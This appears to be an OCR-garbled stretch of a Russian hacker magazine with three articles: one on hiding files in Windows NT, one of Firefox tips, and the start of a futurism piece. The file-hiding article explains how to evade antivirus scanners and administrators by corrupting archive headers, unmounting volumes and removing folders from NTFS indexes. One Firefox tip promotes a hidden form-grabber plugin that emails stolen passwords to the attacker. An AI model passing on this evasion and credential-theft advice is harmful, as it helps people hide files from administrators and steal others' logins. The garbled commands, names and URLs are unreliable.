восстанавливать удаленные файлы). 

Тем не менее, в силу чрезвычайной простоты технической 
реализации, такой принцип сокрытия очень популярен среди 
разработчиков маскировочных программ. Знать устройств о 
операционной системы, владеть ассемблером, уметь писать 
драйверы не требуется. Достаточно поерзать мышью в Беірбі 
— и программа готова! Типичным представителем этого клас- 
са утилит является условно-бесплатная программа НісІезРіІез, 
ознакомиться с которой можно на ѵѵѵѵѵѵ.ЫсІезРІез.согп . 

Однако ни ей, ни легионом ее сородичей пользоваться не 
рекомендуется, поскольку качество шифрования оставляет 
желать лучшего. В некоторых случаях (для достижения на- 
ивысшего быстродействия) никакого шифрования вообще 
не производится и эталонный пароль хранится в «архиве» 
открытым текстом. Ну или не сам пароль, а его контрольная 
сумма. Несмотря на то что восстановить пароль по конт- 
рольной сумме невозможно, для доступа к данным пароль 
не нужен, поскольку они лежат в незашифрованном виде. 
Достаточно дизассемблировать программу, чтобы реконс- 
труировать форматфайла данных, и дальше можно работать 
с ним в обход пользовательского интерфейса. Разумеется, 
домашние пользователи на такое не способны, а потому для 
защиты от них хватит и НісІезРіІез. 

Монтирование и демонтирование 
дисковыхтомов 

Операционные системы семейства ІЧТ (к числу которых 
относится сама ЫТ, ѴѴ2К, ХР и Ѵізіа) поддерживают меха- 
низм монтирования (тоипі) дисковыхтомов (аналогичный 
тому, что имеется в I) N IX). Однако, в отличие отОГЛХ, в ЫТ 
диски монтируются автоматически при их подключении (для 
несъемных носителей это означает, что они монтируются 
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> Программа НісІезРіІез, прячущая файлы и папки от 
посторонних глаз 

всегда), и пользователю нет никакой нужды задумываться 
об этом. 

Междутем, если размонтировать дисковый том (грубо гово- 
ря, отобратьу него букву), он исчезнет из «Моего компью- 
тера», РАР'а. И чтобы получить доступ к его содержимому, 
необходимо выполнить операцию монтирования (о которой 
осведомлены далеко не все администраторы, не говоря уже о 
рядовых пользователях). Причем это совершенно законная и 
абсолютно безопасная операция! 

Хорошая идея — при разбивке диска выделить один раздел 
под секретные файлы, монтируя его только на время рабо- 
ты с ними. Ни антивирусы, ни дисковые доктора, ни прочие 
антихакерские средства не заподозрят и следов «измены». 
В принципе, изменить разбивку диска можно и на лету 
— достаточно воспользоваться РОМадіс или аналогичной 
программой. Внимание: все программы, разбивающие 
диск на лету, не застрахованы отошибок и могутугробить 
один или несколько разделов без малейших шансов на 
восстановление, поэтому обязательно зарезервируйся 
перед разбиением. 

Монтировать диски можно как из командной строки, так и 
через графический интерфейс, что намного нагляднее. Вот 
с него-то мы и начнем! Итак, «Пуск-> Настройка -> Панель 
управления Администрирование Управление ком- 
пьютером». Во вкладке «Структура» находим «Управление 
дисками» и смотрим, какие диски есть на нашем компьютере. 
Допустим, мы хотим демонтировать диск й:. Щелкаем по 
немулевой клавишей мыши, в открывшемся контекстом 
меню выбираем пункт«Изменение буквы диска и пути 
диска». Появляется еще одно диалоговое окно с выделен- 
ной буквой диска и кнопками «Добавить», «Изменить», 
«Удалить» и «Закрыть». Нажимаем «Удалить», после чего 
закрываем окно, выходим из системы управления компью- 
тером и видим, что диск й: не отображается ни в проводнике, 
ни в РАН'е, ни в командной строке. 

Выполняем перезагрузку (если есть та кое желание) и убеж- 
даемся, что при загрузке системы удаленный диск более не 
монтируется в автоматическом режиме. Какже его вернуть 
обратно?! Очень просто! Заходим в «Управление дисками» 
(какбыло показано выше), щелкаем мышью по безымян- 
ному прямоугольнику, выбираем «Изменение буквы диска 
и пути диска», нажимаем кнопку «Добавить» и выбираем 
любую букву из предложенных. Совершенно необязательно 
выбирать именно диск 0:, это вполне можетбытьХ: (а почему 
бы и нет?) и даже путь к существующему ЫТРЗ-каталогу (но о 
каталогах мы поговорим позднее). 

После нажатия на «ОК» смонтированный дисктутже поя- 
вится в «Моем компьютере», РАН'е и остальных менеджерах. 
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> Теперь с диском й: уже не ассоциирована никакая буква и доступ к 
нему из «Моего компьютера» или РАР'а невозможен! 



>> 




Управление дисками через консольадминистрирования 



Перезагружать компьютер для этого не требуется. Некоторые программы, 
перечисляющие диски при запуске, могут не заметить появления нового 
диска, поэтому их следует закрыть и открыть вновь. Но, впрочем, таких 
программ очень немного и с каждым днем становится все меньше и 
меньше. 

Атеперь перейдем к командной строке, которая удобна тем, что монти- 
ровать/размонтировать диски можно нетолько мышью, но и командным 
файлом, запускаемым одним щелчком или даже вызываемым горячей 
комбинацией клавиш. 

Начиная сѴѴ2К (а, можетбыть, и еще раньше], в комплект штатной пос- 
тавки системы входит утилита тоиіѵоі.ехе, которая, как и следует из ее 
названия, предназначена для монтирования/размонтирования дисков. 
При запуске без параметров она выдастсписоклогических дисков вместе 
с назначенными им буквами плиточками подключения. 

Абракадабра в стиле «\\?\ѴоІите{і : сІ9Ь89а6-5675-1 1 б9-9есІ9- 
Ьс1 1 445с469е4}\» представляет собой идентификатор тома, используемый 
системой при «общении»с ним на низкомуровне. Формально ЫТ позво- 
ляет нам (в порыве мазохизма) указывать идентификатор диска вместо 
его буквы (независимо оттого, естьу него эта буква или она удалена), 
однако это слишком громоздко, непотребно и неудобно. 

ПРЯМОЕ ОБРАЩЕНИЕ К ДИСКУ ПО ЕГО ИДЕНТИФИКАТОРУ 

$с1іг /ѵ7 \\?\Ѵо1ите{М9Ъ89а6-5675-11с19- 
9ей9-Ъй1445с469е4}\ 

Том в устройстве \\?\Ѵо1ише{ бс3.9Ь89аб-567 5-11сі9- 
9ес19-Ъс11445с469е4 } \ имеет метку ВАСКБР 
Серийный номер тома: 48РЕ-7В94 



[сіізЪг] 

РогЫі_Таѵа . гір 
[шазш32 ] 
зех_сіо_і1: . ЪаЕ 
[Еетр] 



[ешиіе] РогЫі_^аѵа . ЦхС 

[дате] ІРКАМЕ.ехр.сІос 

[ОББ-ОЬВ] зехдо.ехе 

ЗиЬКір.згЦ [зузЕетѴ] 

новый год и новые планы . еті 



8 файлов 322 679 байт 

9 папок 3 331 104 768 байт свободно 



Для размонтирования диска (удаления буквы) достаточно вызвать 
тоипіѵоі.ехе с ключом ‘/О’ (отс!еІе1:е — «удаление») и буквой удаляемого 
диска, после чего дисктутже исчезнет из «Моего компьютера». 



$тоип1:ѵо1 . ехе Б : /Б 



Хорошо! Диск й: успешно удален. Остается только разобраться, как 
вернуть его обратно. Нет ничего проще! Вызываем тоип^ѵоі.ехе иден- 
тификатором логического диска и буквой, которую мы собираемся ему 
присвоить. Ой, а если мы не помним этот длинный и ужасный иденти- 
фикатор, что делать нам тогда?! Нунепомним.такнепомним! Невелика 
беда. Запускаем утилиту тоипіѵоі.ехе без ключей, и она выводит 
список всех идентификаторов, причем рядом с идентификаторами, с 
которыми не ассоциирована ни одна буква, будет надпись: «Нетточек 
подключения». Выделяем мышью все от одинарной до двойной косой 
черты и нажатием левой кнопки мыши вставляем в командную строку 
следом за командой плои піѵоі. ехе й:. 



$тоипЦѵо1 . ехе Б: \\?\Ѵо1ите{ 1б9Ь89а6-5675-11б9- 
9еб9-Ъ(і1445с469е4}\ 



Содержимое папки \\?\Ѵо1ите{ Ес19Ъ89а6-5675-11с19- 
9ей9-М1445с469е4}\ 

сЪазіпдату . згЦ [бех] [бізк-ссЗ] 



Как мы видим, диск 0 : исправно появляется в «Моем компьютере» и в 
прочих местах. Хочешь — работай с ним как с обыкновенным диском, 
не хочешь — форматируй! Впрочем, нет, форматировать лучше не надо. 
Пришло время познакомиться с одной удивительной возможностью ІЧТ, 



ИГРЫСРК2ІРОМ 

Классический способ маскировки игрушек и «клубнички» сводится купаковке файлов в какой-нибудьархив (например, 21 Р или ВАВ] с последу- 
ющим изменением расширения на .сіаі или что-то вроде того. Считается, что тупой администратор поведется как пионер и ни о чем не догада- 
ется. Три раза: «Ха!» Администратор, быть может, и не догадается (он ведь и не подряжался проверять все файлы в системе), но антивирусы с 
включенной опцией «Проверять архивы» проигнорируют расширение и опознаюттип архива по его содержимому. В результате этого в протокол 
попадетполный списокпроверенных файлов и архив с нетипичным расширениемтутже привлечетксебе внимание, после чего будет безжалос- 
тно удален. 

Чтобы избежать расправы, рекомендуется вооружиться Ыеѵѵ'ом (или любым другим Ьех-редактором) и заменить первые два байта заголовка 
чем-нибудьтаким... этаким... например просто поменять их местами, чтобы не забыть. 

Теперь (после смены расширения] ни антивирус, ни даже сам архиватор ни за что не смогут догадаться об истинном формате файла и спокойно 
пропустят его, даже не жуя. Единственная зацепка, способная вызывать подозрения у администратора, — это неприлично огромный размер фай- 
ла. Стратегия поиска сокрытых данных: «Найди десятку самых длинных файлов и присмотрись к ним повнимательнее» — палит незадачливых 
хакеров только так! Поэтому всегда разбивай архив на несколько файлов разного размера, подбирая его так, чтобы они не слишком выделялись 
среди остальных. 
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поддерживаемой всеми ЦІ N IX, но отсутствующей в линейке 9х, — с воз- 
можностью монтирования логического диска на папку другого диска. 
Зачем это может понадобиться?! Все мы привыкли ктому, что имеются 
диски С:, й:, Е:, однако некоторые считаюттакой расклад неудобным и 
с удовольствием предпочли бы работать с одним логическим диском. 
Или вот... возьмем такой жизненный случай. У нас есть диски С: и й:, 
причем на С: свободного места нет совсем, а на й: его завались. Было бы 
здорово перенести часть программ на й:, но... это невозможно сделать 
без их переустановки, поскольку практически все они привязываются к 
букве диска, на который поставлены. Однако могущество операционной 
системы ЫТ позволяет преодолеть это ограничение весьма простым и 
элегантным способом. 

Предположим, на диске С: находится каталог СЛКРІМС, содержащий 
множество установленных приложений. Что мы делаем? Переносим их в 
корневой каталогдиска 0:так, чтобы каталогСДКРЫС оказался пустым, 
после чего удаляем букву й: и монтируем логический диск на каталог 
СДКРЫС, подставляя его вместо буквы диска: 

$КЕМ размонтируем Б : 

$шоипСѵо1 . ехе Б : /Б 

$КЕМ монтируем логический диск на каталог С: \КРЫС 
$тоипСѵо1 . ехе С:\КРЫС \\?\Ѵо1ите{М9Ь89а6-5675-11с19- 
9ей9-Ьаі445с4б9е4}\ 



Диск й: послушно удалился из «Моего компьютера», и его как будто 
бы нет, однако, открыв каталог СДКРЫС, мы увидим его содержимое 
в целости и сохранности, со всеми программами, которые мы туда 
перенести. И программы продолжат работать как ни в чем не бывало, 
поскольку с ихточки зрения совершенно ничего не изменилось. 

Два маленькихзамечания напоследок. Первое: для монтирования/раз- 
монтирования дисков необходимо обладать правами администратора. 
Второе: монтирование диска на непустой каталог невозможно, так что 
даже не пытайся это делать. 

Заключение 

Помимо приведенных способов сокрытия файлов и папок, сущест- 
вует масса других привлекательныхтрюков, однако рассмотреть их в 
рамках скромной журнальной статьи нет никакой возможности, тем 
более что всякий описанный трюк утрачивает свою магическую силу, 
в результате чего найти спрятанный файл сможетлюбой желающий. 
Трюки же, изобретенные тобой, как правило, оказываются намного 
более надежными. Их не берут ни антивирусы, ни суровые админист- 
раторы, ни жены, ни начальники. А вот дети — раскусывают! Неве- 
роятно, но факт! Так что играть в прятки с детьми взрослым сложнее 
всего. Дети мыслят совсем не так, как мы. У них гибкий мозг, еще не 
испорченный штампами, природная любознательность и потрясаю- 
щая наблюдательность. ЛС 



СТРОГО ДОЗИРОВАННОЕ РАЗРУШЕНИЕ ИНДЕКСОВ 

Файловая система ЫТРЗ примечательна тем, что в ней нет каталогов 
(втом понимании, которое вкладывает в этоттермин М5-005). В ЫТР5 
есть только индексы, и как в любой базе данных, индексы являются 
лишь вспомогательными структурами данных, используемыми для 
быстрого поиска (вывод содержимого заданной директории есть не 
что иное, как операция поиска принадлежащих ей файлов и подката- 
логов). 

Причем в ЫТР5 можно индексировать не только директории, но и дру- 
гие атрибуты, например, файлы по размеру (правда, это не реализова- 
но втекущих версиях драйвера). 

Основная информация о файлах и порядке их размещения на диске 
хранится в служебном файле, именуемом $МРТ, который содержит 
все необходимое для нормального функционирования Р5, в том числе 
и каталоги, являющиеся обычными файлами, ну... или практически 
обычными... 

Индексы дублируют их содержимое. При открытии файла поиск идет 
только по $МРТ, поскольку, как известно, поиск в линейном массиве 
намного быстрее, чем обход кучи деревьев, разбросанных по диску. 

Тем более не нужно забывать, чтоу файла можетбыть несколько имен, 
но индексы допускаютлишь включение одного. То есть файл, имеющий 
несколько атрибутов имен (типа МЗ-йОВ-имя, РОВІХ-имя, ЫТРВ-имя), 
как ни крути, нужно искать в $МРТ. Индексы используются командой 
ОІР, но АР! -функции операционной системы (такие, как СгеаѣеРіІе, 
СгеаІеРгосезз) пляшут от$МРТ, поэтому можно скрыть папку ѴѴіпсіоѵѵб, 
не нарушив ее работоспособность! 

Это достигается за счетудаления каталога из индексов любым 
подходящим дисковым редактором (например, РИЕхрІогегот Рипбгпе 
Зо^ѵѵаге). Тогда она не будет отображаться нигде, однако прямой» 
запуск (путь + имя файла) продолжит нормально работать. Другим сло- 



вами, если мы удаляем папку ѴѴіпсіоѵѵб из индексов, команда БІР С:, как 
и следовало ожидать, не покажет ее, но вот йІР СДѴѴіпсіоѵѵб отработает 
нормально. Впрочем, при первом же запуске сЬ ксізк'а он ее вылечит, 
восстановив недостающую запись в индексах. Тутего, правда, можно 
обломать, но тогда придется перестраивать кучу структур данных на 
диске (подобнее о которых можно прочитать в книжке Криса Касперски 
«Восстановление данных — практическое руководство»), а это уто- 
мительно и небезопасно. Зато такое сокрытие не требует присутствия 
резидентов в памяти, абсолютно безглючно и ничем (кроме сбксІБк'а) 
не обнаруживается... 

Еще на ЫТРВ-разделах можно создавать «виртуальные папки» (термин 
взят из мира ѵѵеЬ). Допустим, мы имеем папку С:\Х\Ѵ\. Так вот, папка У 
существует, а X — нет. Точнее, она существует, но у нее удален ирііпк 
на корень С:\, и потому добраться до У можно, только зная полный путь. 
СЬксІБк на это внимания уже не обращает. 

Перейти в папку С:\Х также нельзя, йІР С:\Х скажет, что нету здесь ни- 
какой папки X и отродясь не бывало. Таким образом, У надежно скрыта 
от глаз пользователя и антивирусов. В ней же можно держать все что 
угодно... Правда, антивирусы сканируютзапущенные процессы, и 
потому положить в нее резидента не получится, как не получится и 
положить троянский плагин, поскольку нам придется прописывать 
полный путь, а его-то антивирусы захавают... Но зато спрятать игрушку, 
видеофильмы и прочую порнушку можно без труда и напряжения 
мозговых извилин. 

Во всяком случае, на ѴѴ2к автор проделывал этоттрюк неоднократно, 
особенно часто на 2ІР-дискетах (не путать с РК2ІР-архиватором!). 

Была необходимость пронести на них исполняемые файлы, перед 
этим отдав их на проверку администратору. Тот посмотрел, а там 
одни нормальные файлы, никакие не исполняемые. Кстати, с 2ІР'ом 
намного безопаснее экспериментировать, чем с Мб, и он быстрее, чем 
виртуальный диск под ѴМѴѴаге... 
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Что можно натворить 
с Рігеіох?! 

16 фактов о Рігеіох, которые ты наверняка не знал 

Среди огромной армии поклонников Рігеіох лишь малая часть знает о том, почему этот бра- 
узер так примечателен и как его правильно использовать. Остальные же тупо юзают голый 
движок Огненной Лисы, в лучшем случае лишь подозревая, что его скромную функциональ- 
ность можно каким-то образом расширить. Стоп! О каких плагинах может идти речь, если 
даже со стандартными возможностями браузера знакомы далеко не все? 



з огромного числа советов и рекомендаций по настройке и 
использованию РігеЬх мы постарались отобрать самые по- 
лезные и часто применяемые твики. При всей их простоте 
настоятельно рекомендую взять их на вооружение. Очень 
скоро ты поймешь, что каждая функция Рігеіюх реализована не случайно 
и позволяетэкономить массу времени. А время — это, какизвестно, 
деньги, и чем быстрееты найдешь нужную информацию, тем быстрее 
разберешься со своими проблемами. Собственно, это и есть 
первый твик. 



Прелести жизни 

1 . Для того чтобы отыскать нужную информацию на странице, необяза- 
тельно открывать окно поиска. РІайти слово на странице можно очень 
быстро, набрав его на клавиатуре сознаком слеша:/слово. Онотутже 
выделится желтым цветом. Следующее совпадение будет найдено по 
нажатию <СМ-6> или <РЗ>. 

2. РІовую вкладку можно открыть, дважды кликнув на свободном месте 
ТаЬ Вагили с помощью горячей клавиши <СМ-Т>. 

3. Многие мучаются с закладками и даже для того, чтобы их рассорти- 
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> Страница с параметрами, скрытыми от глаз обычного 
пользователя 



ровать, используютокноуправления букмарками. Действительно, если 
просто пытаться перемещать их между папками, ничего не получится. 
Однако функции бгад’п’сігор, на самом деле, реализованы, просто исполь- 
зовать их нужно, удерживая клавишу <5ЫЙ>. 

4 . Обращаться к наиболее часто используемым закладкам можно намного 
быстрее, назначив для них ключевые слова (так называемые алиасы). 
Рецепт такой: нажми правой кнопкой мыши на закладку, зайди в ее свойс- 
тва и введи ключевое слово в пункте «Краткое имя». Поступив, таким 
образом, можно, например, быстро перейти на сайт ѵѵѵѵѵѵ.хакер.ги . набрав 
в адресной строке просто «ха». 

5 . Полем для быстрого поиска, избавляющим нас от необходимости 
напрямую обращаться к поисковым механизмам, я пользуюсь десятки, 
а иногда и сотни раз в день. Единственная загвоздка состоит в том, что 
список поддерживаемых поисковиков хоть и расширяем, но весьма ог- 
раничен. А ведьтак иногда хочется реализовать оперативный доступ к 
полю поиска любимого сайта или форума. К счастью, делается это очень 
просто опять же с помощью системы алиасов. Перейди на страницу с 
полем поиска нужного сайта, кликни по нему правой кнопкой мыши и в 
контекстном меню выбери «Добавить краткое имя для данного поиска». 
Все, что теперь нужно, — это в адресной строке набрать имя алиаса, а 
затем ключевые слова для поиска: ха эксплойт для ІЕ. Круто! 

Маленькие хитрости 

6. РігеЬх честно расскажет, что он сохранил в кэш, если набрать в 
адресной строке следующее: аЬоиЕсасбе?сІеѵісе=сІІ5к. Кстати говоря, 
любые страницы из кэша можно серфить, просто выбрав в меню «Файл 
-> Работать автономно». 



>> 




> Отслеживаем исходящие запросы браузера с помощью Татрег 
йа(а 



7 . А если в качестве адреса ввести «аЬоиЕсасбе?сІеѵісе=тегпогу», на 
экране отобразится информация отом, что в настоящий момент находится 
в памяти процесса. 

8. На что только не идут веб-мастера, чтобы защитить свой контент от 
кражи. Доходит даже до абсурда, когда с помощью ^ѵаВсгірІ: изменяется 
реакция на клик правой кнопкой мыши. Вместо появления контекстного 
меню браузера, выскакиваетнепонятное сообщение об ошибке. Такую 
самодеятельность лучше всего пресечь следующим образом: «Инстру- 
менты -> Опции-> Дополнительно» и снять галку с опции «Отключать или 
заменять контекстное меню». 

9. То, что браузер сохраняет посещенные ІІРБ и потом предлагает 
подходящие варианты во время ввода адреса, знает каждый. Удобная 
штуковина, однако может поста вить тебя в неудобную ситуацию, если в 
этот список попадает что-то компрометирующее. Что делать? Удалять 
всю историю посещений («Инструменты -> Удалить личные данные») 

— хороший вариант, нотолько на чужом компьютере. А дома лучше всего 
подчиститьсписоксохраненных ИВЕ вручную и частично. Просто начни 
вводить адрес нужного сайта и, послетого как в выпадающем списке 
появится ІІПЕ, наведи на него и нажми <йе1е1:е>. 

Тюнинг производительности 

10 . Еслиты заметил, что встроенный менеджер закачек сильнотормозит, 
а его окошко появляется с заметной задержкой, очисти логи загрузок: 
«Инструменты -> Личные данные -> История закачек». Кстати говоря, 
начать новую закачку можно очень оперативно, перетащив л инк на файл в 
окно Ооѵѵпіоасі Мападег. 

1 1. Браузер может работать намного быстрее, если внести коррективы 




> Для более глубоко исследования страницы приго- 
дится плагин Ѵіеѵѵ 0ерепс1епсіе5 



ГОРЯЧИЕ КЛАВИШИ 

<Пробел> — страница вниз 
<5ЫЛ-Пробел> — страница вверх 
<СШ-Р> — поиск 

<АИ-Ы> — поискследующего совпадения 
<СШ-0> — добавить страницу в закладки 
<СігІ-Т> — новая вкладка 
<СШ-К> — перейти в поле поиска 
<СШ-Е> — перейти в адресное поле 
<СМ-=> —увеличить размер шрифта 
<СШ— > —уменьшить размер шрифта 
<СШ-ѴѴ> — закрыть вкладку 
<Р5> — перезагрузить страницу 
<АІІ-РІоте> — перейти на домашнюю страницу 
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> Мануал по созда- 
нию собственных 
плагинов — Ыф:// 
гоасЫіепсІ.сот/ 
агсЫѵеБ/2004/12/08/ 
боѵѵ-іо-сгеаіе- 
ІігеІох-ехІепБІопБ : 
Взлом А^АX-прило- 
жений при помощи 
Рігеіох — \лллАЛ/. 
зесигіЫосиз.сот/ 
іпІоси5/і879 : 
Описание всех 
скрытых параметров 
Рігеіох — Ыф:// 
кЬ.тогіІІагіпе. 
огд/РігеІох : РАОз : 
АЬоиЕсопГд Епігіез . 




> Архитектура РігеЬх 
позволяет вносить 
любые изменения во 
внешний вид про- 
граммы, фактически 
изменяя его до неуз- 
наваемости. Для это- 
го достаточно знать 
нужные директивы и 
прописать их в файле 
ОзегСЬготе.сзз. 

Как их узнать? 
Прочитав об этом на 
сайте ѵѵѵѵѵѵ.тогіЦа. 
ога/ипіх/сизіотігіпа. 
Ыті . 



г а 




V 



> Не забудь взглянуть 
на наш ОѴй-диск 
— там тебя ждет 
масса полезностей 
для Рігеіох. 




в некоторые настройки, которые скрыты от глаз обычного 
пользователя и становятся доступными, если набрать в ад- 
ресной строке — «аЬоиГсопбд». Тут ты найдешь параметр 
Ьгоѵѵзег.5езіопЫ5І:огу.тах_еп^гіе5, с помощью которого 
задается максимальное количество сайтов, подгружаемых 
Рі геРох в свою память. Такие сайты моментально откры- 
ваются прямо из памяти, если мы переходим на них вновь 
(например, нажимаем кнопку «РІазад» или «Вперед»]. По 
умолчанию этот параметр равен 50. Представляешь: пять 
десятков сайтов, постоянно висящих в памяти без особой 
необходимости. Так дело не пойдет, поэтому уменьши этот 
параметр до пяти и наслаждайся результатом. 

12 . Зачем процессу занимать десятки и даже сотни мегабайт 
оперативки, если окно РігеРох свернуто? Действительно, 
незачем. С помощью ключа сопбдТгіт_оп_тіпітІ 2 е можно 
переместить процесс свернутого браузера на жесткий диск. 
После этого в оперативке остается только 8-10 Мб. Однако в 
списке параметров аЬоиГсопбд некоторые важные опции по 
умолчанию отсутствуют, втом числе и названный ключ. По- 
этому его придется создать самостоятельно: кликни правой 
кнопкой мыши по списку параметров, далее в меню выбери 
«Создать Логическое», задай имя названной опции и 
укажи Ігие. Вот и все. 

13 . Еще один совет — ограничь максимальное количество 
памяти, которое Рігеіох может использовать. За это отвеча- 
ет параметр ЬгоѵѵБег.сасбе.тетогу.сарасіІу. Оптимальную 
величину этого параметра нужно подобрать самому, но для 
установки начального значения руководствуйся следую- 
щим принципом. Если у тебя 512-1024 Мб оперативки, то 
значение параметра можно выставить в 1 5000. Если 128- 
512 Мб, то — в 500. 

1 4. Сложно сосчитать, сколько раз я закрывал браузер с нуж- 
ными вкладками или, что еще хуже, с заполненными полями. 
Сколько можно? Если выставить опции ЬгоѵѵБег.БІагІир.раде 
значение «3», то браузер автоматически будет восстанавли- 
вать последнюю сессию. 

Безопасность 

15 . А как насчеттрояна внутри Рігеіох — идеального шпи- 
она, который находится в недрах браузера и в принципе 
не может быть обнаружен антивирусами? Такая штуко- 
вина существует. Она называется РРбпіРР ( ЫТрѴ/агигіІ. 
еІЬіабоБбпа.зк/іІБпііЯ и устанавливается как обычный 
плагин, превращая браузер в формграббер. Каждый 



раз, когда пользователь будетжать кнопку «БиЬтіІ:», 
РРбпіРР будет искать среди введенных данных пароли. 

Все найденные пассворды отправляются на указанный 
в настройках етаіі-адрес. Кстати, о настройках. Плагин 
не имеет графического интерфейса (более того, он даже 
умеет прятать себя в списке плагинов, используя один 
из последних багов Огненной Лисы), так что придется 
поковыряться ручками в файле сЬготе/сопІепі/ЯБпіЯ/ 
ЯБпіЯОѵегІаудБ и указать етаіі-адрес для отправки, а 
также рабочий ЗМТР-сервер. 

16 . Напротив, чтобы предотвратить перехват данных 
(правда, не формграбберов, а кейлоггеров), рекомендую 
использовать КеуЗсгатЫег Регзопаі ( Ы:1р5://аббоп5. 
то2ІИа.ога/гиЛігеіох/асІс1оп/3383 ). Главная часть системы 
работает на уровне ядра, и шифрует все коды, поступаю- 
щие с клавиатуры, и уже в криптованном виде передает 
браузеру. Тот с помощью специальной насадки плагина 
дешифрует коды клавиш и отправляет дальше по сети. 
Кейлоггеры при таком раскладе остаются не удел, записы- 
вая в свои логи бесполезные шифровки вместо реальных 
кодов клавиш. 
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> Оперативно редактируем Соокіе 




> Создаем алиас для 
быстрого поиска 




>Этот параметр позволяет 
уменьшить аппетиты РігеЬэх по 
части оперативной памяти 




> Вердикт НеабегЗру: на сервере крутится Арасбе 2.0.52 



ПЛАГИНЫ ДЛЯ ХАКЕРА 

Рассматривать обычные плагины — дело довольно утомительное. 
Обзоры можно найти где угодно, в том числе и архивах нашего жур- 
нала. Куда интереснее разобраться, как превратить Рігеіох в верный 
инструмент хакера, напичканный всевозможными вспомогательными 
утилитами. Итак, поехали. 

О ѴНОІЗ И ОПРЕДЕЛЕНИЕ МЕСТОРАСПОЛОЖЕНИЯ 

Чтобы оперативно выяснить ІР-адрес текущего сайта, советую уста- 
новить плагин ЗНоѵѵІР, а для получения более детальной информации 
— Асііѵе ѴѴНоіз. Теперь ІР’шник будет отображаться прямо в поле 
статуса. Можно пойти дальше и посмотреть физическое месторас- 
положение сервера на карте мира — с этим справится Збагои. Один 
из моих знакомых хакеров рекомендует установить специальную 
панель — ВІЬІгтег ТооІЬаг, представляющую собой сборную солянку 
сервисов ѴѴбоІз, йИЗ Рероб, Сеоіосаііоп, Тгасегоиіе, Ріпд. 

□ Анализ ресурса 

Перехватить НТТР-хедеры, чтобы посмотреть, что передается 
серверу и что от него возвращается обратно, вполне реально без 
посторонних программ. Достаточно лишь установить плагин Неабег 
Зру или Неабег Мопііог. Кстати говоря, одним только перехватом дело 
не ограничивается, и ты можешь налету изменять параметры полей. 
Чаще всего приходится подделывать информацию об используемом 
браузере, но в этом случае лучше всего задействовать специали- 
зированную добавку — ІІзег Адеп( ЗѵѵИсНег. Если ты внимательно 
читал наши материалы о поисковой системе Сіоодіе, то должен знать, 
насколько полезным может оказаться этот поисковик во время 
изучения чужого сайта. Г лавное — быть знакомым о операторами 
поиска или же установить шпаргалку — плагин Абѵапсеб богк. 

О Программирование 

Одним из самых мощных плагинов для Рігеіох является отладчик 
РігеЬид. Он интегрируется в Рігеіох на глубоком уровне и позволяет в 
реальном времени изменять, отлаживать и просто отслеживать вы- 
полнение НТМІ_-кода, СЗЗ, баѵаЗсгірі на абсолютно любой странице. 



Таких возможностей не предоставляют даже отдельные пакеты для 
разработчиков. Встроенный редактор-просмотрщик кода («Вид -> Ис- 
ходный код страницы») хоть и неплох, но всегдахочется использовать 
более привычные инструменты. Благодаря установленному бЗѴІеѵѵ 
Рігебох будет отображать исходный код документа во внешней про- 
грамме, которую ты укажешь в настройках или просто новой вкладке. 
Что касается ХМБ-разработчиков, то им сам Бог велел установить 
специальную панель — ХМІ_ Оеѵеіорег Т ооІЬаг. Все стандартные 
утилиты, которые обычно распространяются в специализированных 
средах разработки, теперь будут как на ладони. 

□ Работа с соокіез 

Каждый раз, когда форум узнаеттебя, а не спрашивает имя и пароль 
заново, в этом участвуют кукисы и сессии. Если немного с ними 
помухлевать, вполне реально добиться интересного результата. 
Удобный интерфейс для прямого доступа к кукисами предоставляет 
плагин Абб N Ебі( Соокіез, позволяющий добавлять и редактировать 
как параметры текущей сессии, так и сохраненные кукисы. Если тебе 
интересно, в какой форме и кто сохраняет «плюшки», рекомендую 
установить насадку АІІсоокіез, которая будет складывать абсолют- 
но всю информацию в текстовый файл. Еще один занятный плагин 
— СоокіеЗѵѵар. В его компетенции управление несколькими профай- 
лами, вкаждом из которых хранятся свои кукисы, позволяющее быс- 
тро переключаться между ними во время серфинга. Я использую его 
на всю катушку, чтобы работать с разными аккаунтами на сервисах 
Сіоодіе ботѵѵѵ.атаіі.сот и т.д.) 

□ Хакерские радости 

Еслитебе нужен инструмент для поиска ХЗЗ-дыр, осуществления 
ЗОБ-инъекции и выполнения прочих атак прямо внутри сайта, то 
НаскВаг — это именно тот плагин, который ты искал. Понятно, что он 
не сделает всю работу за тебя, но в том, что он ее облегчит, даже не 
сомневайся. Другая полезная хакерская тулзаТатрег Оаіапредна- 
значенадля изменения налету РОЗТ-запросов (как, впрочем, и НТТР/ 
НТТРЗ-заголовков). А РохуРгоху лучше всех позаботится о твоей 
анонимности, предоставив шикарный интерфейс для управления и 
переключения между прокси-серверами. НС 
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ЮРИЙ СВИДИНЕНКО 

/ МЕТАМОВРН ѴАМОЕХ.РЮ / 



Будущее 

рядом! 

Г аджеты будущего, существующие уже сегодня 

Как говорил один умный человек, «...будущее уже здесь, только оно неравномерно рас- 
пределено». Это очень точно описывает ситуацию в области хай-тека, которая сложилась 
сейчас в мире. С одной стороны, повальная информатизация, беспроводный интернет, 
спутниковый шпионаж с помощью Соо§1е Еагт, а с другой — тот факт, что электрификация 
Европы полностью закончилась только в прошлом году. Это при том, что лампочку Ильича 
в наших селах советский народ увидел уже в 30-е годы прошлого века. 




□ это очень печально. Представь себе, что инопланетяне со- 
вершили вынужденную посадку у нас на Земле и их экипаж 
выпрыгнул на двух капсулах с корабля. Первая попала в 
дебри Африки, например, в республику Чад. А вторая — пря- 
миком на Манхэттен. Я думаю, что, связавшись после приземления, наши 
гости будутуверены в том, что находятся на разных планетах — столь 
контрастны технологии этих регионов Земли. 

И фантасты в этом, конечноже, не виноваты — очень многое зависит 
от мировой политики, глобализации, да и просто уровня развития 
отдельных стран и народов. И тут ничего не поделаешь. Технологический 
разрыв есть и будет существовать, по крайней мере до всеобщей глоба- 
лизации человечества. 

Поэтому когда, скажем, житель той же республики Чад читает (при этом 
еще не факт, что он умеет читать) фантастический роман о мире будущего 
из стекла и бетона с движущимися тротуарами и скручивающимися в 
трубку электронными газетами, он думает: «Во как круто! Это ж будущее!» 
— и даже не догадывается, что и то и другое уже существует где-то на 
нашем шарике. 



Гт іпѵізіЫе тап! 

Начнем с простого примера: подводная лодка «Наутилус»уже не 
будоражитумы — мы видали и «электрические», и ядерные субмарины, 
способные нето что корабль потопить, но и сровнять с землей небольшой 
город. Из пушки на Луну никто не летает, но зато собираются запускать из 
ее электромагнитного аналога микроспутники на орбиту. 

Теперь пример посложнее. Герберт Уэллс в свое время написал заме- 
чательный роман «Человек-невидимка». Замечателен он был тем, что 
